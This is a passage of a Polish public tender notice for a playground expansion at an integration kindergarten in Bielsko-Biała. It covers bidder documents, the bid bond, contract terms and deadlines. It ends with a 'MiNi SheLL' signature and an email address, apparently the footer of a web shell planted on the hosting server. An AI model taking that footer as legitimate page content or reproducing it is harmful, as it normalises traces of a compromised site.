obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie<br/>wykonawcy;<br/>b) Dowody określające, czy wymienione w ww. wykazie usługi/roboty budowlane zostały wykonane należycie, przy czym dowodami,<br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty;<br/>Uwaga: Jeżeli wykaz, oświadczenia lub inne złożone przez wykonawcę dokumenty budzą wątpliwości zamawiającego, może on<br/>zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były wykonane, a w przypadku świadczeń okresowych<br/>lub ciągłych są wykonywane, o dodatkowe informacje lub dokumenty w tym zakresie.<br/>c) Wykaz osób (w formie elektronicznej lub postaci elektronicznej) (Załącznik nr 5b<br/>do SWZ) skierowanych przez wykonawcę do realizacji zamówienia publicznego,<br/>w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia, niezbędnych<br/>do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi osobami.<br/>Uwaga: Wzór Wykazu usług/robót, stanowiący Załącznik nr 5a do nin. SWZ oraz wzór Wykazu osób, stanowiący Załącznik nr 5b do<br/>nin. SWZ, zostaną przekazane wykonawcy, którego oferta została najwyżej oceniona, w postaci elektronicznej, wraz z wezwaniem.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych, o ile wymaga ich złożenia wraz z ofertą, a <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wykonawca ich nie złożył, bądź złożone środki dowodowe są niekompletne, tj. ww. odpowiednie dokumenty (w języku<br/>polskim), np. karty techniczne, karty katalogowe producenta, wymagane przepisami prawa certyfikaty, inne dokumenty,<br/>opisujące techniczne parametry zaoferowanych materiałów i urządzeń równoważnych, lub/oraz inne dokumenty (w języku<br/>polskim) dotyczące norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji<br/>technicznych, o których mowa ustawie Pzp, odnoszące się do rozwiązań równoważnych, pozwalające jednoznacznie <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Oferta przetargowa sporządzona na formularzu Oferta, stanowiącym Załącznik nr 1 do nin. SWZ, zawierająca m.in.:<br/>a) Informację o oferowanym terminie wykonania zamówienia: do 4 miesięcy od daty zawarcia umowy;<br/>b) Zobowiązanie wykonawcy do:<br/>- udzielenia gwarancji jakości na wykonane roboty budowlane, w tym użyte materiały i urządzenia, na okres nie krótszy niż 3<br/>lat (36 miesiące), licząc od daty przekazania przez wykonawcę przedmiotu umowy i przyjęcia go przez zamawiającego, jako<br/>należycie wykonany, na warunkach określonych we wzorze umowy (Załącznik nr 5 do nin. SWZ),<br/>- udzielenia rękojmi za wady przedmiotu zamówienia, w tym użyte materiały i urządzenia, na okres 5 lat (60 miesięcy), licząc<br/>od daty odbioru przedmiotu zamówienia, na warunkach określonych we wzorze umowy (Załącznik nr 5 do nin. SWZ);<br/>c) Informację o czasie wydłużenia okresu udzielenia gwarancji jakości – wykonawca jest zobowiązany w formularzu Oferta,<br/>stanowiącym Załącznik nr 1 do nin. SWZ, podać informację o zaoferowanym czasie wydłużenia okresu udzielenia gwarancji jakości w pełnych miesiącach, w przypadku, w którym wykonawca wyraża chęć, aby jego oferta otrzymała punkty w II<br/>kryterium oceny ofert – czas wydłużenia okresu udzielenia gwarancji jakości;<br/>d) Informację o oferowanych warunkach płatności – nie krótszym niż 30-dniowy termin płatności, na warunkach określonych<br/>we wzorze umowy (Załącznik nr 6 do nin. SWZ);<br/>e) Informację o terminie związania ofertą przez okres 30 dni;<br/>f) Oświadczenie wykonawcy o:<br/>- zdobyciu informacji koniecznych do sporządzenia oferty,<br/>- zapoznaniu się z warunkami postępowania o udzielenie zamówienia publicznego, określonymi w SWZ wraz z załącznikami<br/>i przyjęciu tych warunków bez zastrzeżeń,<br/>- zobowiązaniu się do zawarcia umowy, na warunkach określonych we wzorze umowy (Załącznik nr 6 do nin. SWZ),<br/>- zobowiązaniu się w terminie do 7 dni od daty zawarcia umowy dostarczyć zamawiającemu szczegółowy harmonogram<br/>rzeczowo-finansowy realizacji prac projektowych i robót budowlanych objętych umową, o którym mowa we wzorze umowy<br/>(Załącznik nr 6 do nin. SWZ),<br/>- zobowiązaniu się oraz zobowiązaniu podwykonawców do zatrudnienia na podstawie umowy o pracę osób wykonujących<br/>wskazane przez zamawiającego czynności w zakresie realizacji zamówienia, tj. czynności będące robotami budowlanymi w<br/>miejscu wykonywania przedmiotu zamówienia, w zakresie określonym w nin. SWZ, przez cały okres realizacji przedmiotu<br/>zamówienia, z wyłączeniem kadry kierowniczej. Szczegółowe informacje dotyczące zobowiązania zatrudnienia osób na<br/>umowę o pracę zostały określone w nin. SWZ oraz we wzorze umowy (Załącznik nr 6 do nin. SWZ);<br/>g) Informację o zamiarze powierzenia wykonania części zamówienia podwykonawcom – wykonawca jest zobowiązany w<br/>formularzu Oferta, stanowiącym Załącznik nr 1 do nin. SWZ, wskazać części zamówienia, których wykonanie wykonawca<br/>zamierza powierzyć podwykonawcom i podać firmy podwykonawców (nazwy i adresy) oraz wartość lub procentową część<br/>zamówienia, jaka zostanie powierzona podwykonawcom, w przypadku realizacji zamówienia przy pomocy podwykonawców.<br/>W przypadku nie wskazania części zamówienia, których wykonanie wykonawca zamierza powierzyć podwykonawcom,<br/>zamawiający uzna, że całość zamówienia wykonawca wykona samodzielnie;<br/>h) Informację o zastosowaniu materiałów i urządzeń równoważnych, lub/oraz rozwiązań równoważnych <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: 1.500,00 zł (słownie: tysiąc pięćset<br/>00/100 złotych);<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy wskazany przez zamawiającego<br/>(wyłącza się możliwość wniesienia zabezpieczenia w gotówce), tj. Bank PeKaO S. A. Oddział w Bielsku-Białej, ul. ks.<br/>Stanisława Stojałowskiego 23, nr 25 1240 4142 1111 0000 4822 9638, podając w tytule: „Wadium do przetargu<br/>prowadzonego w trybie podstawowym bez negocjacji pn. opracowanie pełnozakresowej dokumentacji projektowej wraz z<br/>rozbudową i doposażeniem istniejącego placu zabaw oraz budową ogrodzenia w systemie „zaprojektuj i buduj” - w ramach<br/>zadania Budżetu obywatelskiego pn. „Więcej ruchu mały zuchu” - zakup i montaż integracyjnego zestawu sprawnościowego<br/>oraz innych urządzeń rekreacyjnych wraz z ogrodzeniem dla przedszkola integracyjnego nr 1 przy u. Korzennej 37 w<br/>Bielsku – Białej”.Uwaga: Przy wnoszeniu zabezpieczenia przelewem dokument polecenia dokonania przelewu<br/>nie jest dowodem wniesienia zabezpieczenia. Potwierdzeniem dokonania wpłaty zabezpieczenia jest uznanie kwotą<br/>zabezpieczenia rachunku bankowego zamawiającego (wpływ środków na rachunek bankowy zamawiającego).<br/>Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci<br/>elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w<br/>ustawie p.z.p.<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż<br/>pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Miasto Bielsko-Biała Urząd Miejski w Bielsku-Białej, pl. Ratuszowy 1, 43-300<br/>Bielsko-Biała<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga abyporęczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p.<br/>8. W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet<br/>zabezpieczenia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno<br/>być załączone do oferty. 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,oświadczenia,<br/>składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają na formularzu OFERTA oświadczenie, z którego<br/>wynika, które roboty budowlane wykonają poszczególni wykonawcy. 4. Oświadczenia i dokumenty potwierdzające brak<br/>podstaw do wykluczenia z postępowania<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z par. 25 wzoru umowy stanowiącym załącznik nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-19 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://um-bielsko.logintrade.net/rejestracja/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-19 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-17</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Cd.:<br/>SEKCJA V - KWALIFIKACJA WYKONAWCÓW<br/>wykluczenia:<br/>Zamawiający wykluczy z postępowania wykonawców, wobec których zachodzą podstawy wykluczenia, o których mowa w<br/>art. 108 ust. 1 pkt.1-6) ustawy Pzp oraz na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego (Dz. U. z 2022r.poz.835.)

Creat By MiNi SheLL
Email: jattceo@gmail.com